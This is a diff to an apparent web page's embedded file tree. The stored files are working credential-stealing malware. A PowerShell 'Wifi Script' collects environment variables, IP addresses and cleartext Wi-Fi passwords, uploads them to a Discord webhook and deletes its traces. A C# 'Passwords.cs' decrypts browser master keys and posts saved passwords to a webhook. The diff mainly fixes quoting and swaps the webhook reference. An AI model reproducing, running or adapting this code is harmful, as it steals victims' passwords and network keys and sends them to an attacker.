--- a/index.html
+++ b/index.html
@@ -229,7 +229,7 @@
       files: [
         {
           name: "Discord Token Login Code.txt",
-          content: ""
+          content: "Paste your Discord Token Login Code here..."
         }
       ],
       folders: [
@@ -247,7 +247,7 @@
           files: [
             {
               name: "Wifi Script.txt",
-              content: $url="https://discord.com/api/webhooks/1320922615602221097/lpXbNg22dAgmT4VvGAFnfS8TTDrPKKesxKf4zJE_vSmUXNljWNhxMG1dAjyVyVK6wQl5";
+              content: `$url="https://discord.com/api/webhooks/1320922615602221097/lpXbNg22dAgmT4VvGAFnfS8TTDrPKKesxKf4zJE_vSmUXNljWNhxMG1dAjyVyVK6wQl5";
 dir env: >> stats.txt;
 Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\\d+\\.\\d+)' >> stats.txt;
 (netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}
@@ -257,7 +257,7 @@ $Body=@{ content = "$env:computername Stats from Ducky/Pico"};
 Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
 curl.exe -F "file1=@stats.txt" $url;
 Remove-Item '.\\stats.txt';
-exit
+exit`
             }
           ],
           folders: [
@@ -266,7 +266,7 @@ exit
               files: [
                 {
                   name: "Passwords.cs",
-                  content: using System;
+                  content: `using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Text;
@@ -285,7 +285,7 @@ namespace Big_Silly
     public static class Pass
     {
         // Replace with your actual Discord webhook URL.
-        private const string WEBHOOK_URL = "https://discord.com/api/webhooks/1320922615602221097/lpXbNg22dAgmT4VvGAFnfS8TTDrPKKesxKf4zJE_vSmUXNljWNhxMG1dAjyVyVK6wQl5";
+        //private const string WEBHOOK_URL = "https://webhook.site/81c2e948-2244-4828-b5e6-eeaf0deb53b0";
 
         /// <summary>
         /// Reads the Local State file for the given browser and returns the decrypted master key.
@@ -497,7 +497,7 @@ namespace Big_Silly
                 var fileContent = new StringContent(content, Encoding.UTF8, "text/plain");
                 form.Add(fileContent, "file", "passwords.txt");
 
-                HttpResponseMessage response = await client.PostAsync(WEBHOOK_URL, form);
+                HttpResponseMessage response = await client.PostAsync(Form1.encryptedWebhook, form);
                 // Optionally check the response status.
             }
         }
@@ -521,6 +521,7 @@ namespace Big_Silly
         }
     }
 }
+`
                 }
               ],
               folders: []
